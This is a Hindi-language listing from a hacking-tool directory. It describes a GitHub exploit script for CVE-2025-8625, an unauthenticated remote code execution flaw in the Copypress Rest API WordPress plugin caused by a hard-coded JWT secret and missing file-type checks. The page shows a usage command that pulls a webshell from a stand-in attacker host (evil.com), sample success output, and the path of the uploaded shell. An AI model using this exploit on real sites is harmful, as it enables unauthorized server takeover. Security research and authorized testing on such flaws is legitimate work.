Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-8625 — Copypress Rest API 1.1 - 1.2 - कॉन्फ़िगर करने योग्य JWT सीक्रेट और फ़ाइल-प्रकार सत्यापन की कमी से अप्रमाणित रिमोट कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-8625
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubnxploited/cve-2025-8625

CVE-2025-8625

Copypress Rest API 1.1 - 1.2 - कॉन्फ़िगर करने योग्य JWT सीक्रेट और फ़ाइल-प्रकार सत्यापन की कमी से अप्रमाणित रिमोट कोड निष्पादन

रिपॉजिटरी देखें
210 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-8625

Copypress Rest API 1.1 - 1.2 - कॉन्फ़िगर करने योग्य JWT सीक्रेट और फ़ाइल-प्रकार सत्यापन की कमी से बिना प्रमाणीकरण के रिमोट कोड निष्पादन

🛡️ Copypress Rest API 1.1 - 1.2 RCE एक्सप्लॉइट

📝 विवरण

वर्डप्रेस के लिए Copypress Rest API प्लगइन (संस्करण 1.1 से 1.2) copyreap_handle_image() फ़ंक्शन के माध्यम से रिमोट कोड निष्पादन की भेद्यता से ग्रस्त है।
प्लगइन जब कोई सीक्रेट सेट नहीं होता है तो हार्ड-कोडेड JWT साइनिंग कुंजी का उपयोग करता है और फ़ाइल प्रकारों को मान्य नहीं करता है, जिससे बिना प्रमाणीकरण वाले हमलावर टोकन जाली बना सकते हैं और इमेज हैंडलर एंडपॉइंट के माध्यम से मनमानी फ़ाइलें (जैसे PHP शेल) अपलोड कर सकते हैं।

  • CVE: CVE-2025-8625
  • CVSS: 9.8 (गंभीर)

🚀 स्क्रिप्ट अवलोकन

स्क्रिप्ट नाम: CVE-2025-8625.py
यह Python स्क्रिप्ट भेद्यता के शोषण को स्वचालित करती है, जिससे आप एक मान्य JWT उत्पन्न कर सकते हैं, एक क्राफ्टेड अनुरोध भेज सकते हैं, और भेद्य WordPress साइट पर एक दुर्भावनापूर्ण फ़ाइल (webshell) अपलोड कर सकते हैं।


⚙️ उपयोग

root@kitploit:~
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
  • -u / --url: लक्षित WordPress साइट URL
  • -shell / --shell: आपके webshell या दुर्भावनापूर्ण PHP फ़ाइल का सीधा लिंक

उदाहरण आउटपुट:

root@kitploit:~
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.

🏆 विशेषताएँ

  • प्लगइन के हार्डकोडेड सीक्रेट का उपयोग करके एक मान्य JWT उत्पन्न करता है
  • मनमानी फ़ाइलें अपलोड करने के लिए प्रमाणीकरण को बायपास करता है
  • शोषण की सफलता/विफलता के लिए स्पष्ट आउटपुट प्रदान करता है
  • सरल कमांड-लाइन इंटरफ़ेस

📂 शेल अपलोड स्थान

शेल सफलतापूर्वक अपलोड हो गया! 🎉
शेल पथ उदाहरण:

root@kitploit:~
https://target.com/wp-content/uploads/2025/10/shell.php

⚠️ अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत पेनेट्रेशन परीक्षण उद्देश्यों के लिए है।
स्पष्ट अनुमति के बिना लक्ष्यों के विरुद्ध उपयोग अवैध है।


द्वारा: Nxploited (Khaled Alenazi)

टूल डाउनलोड करें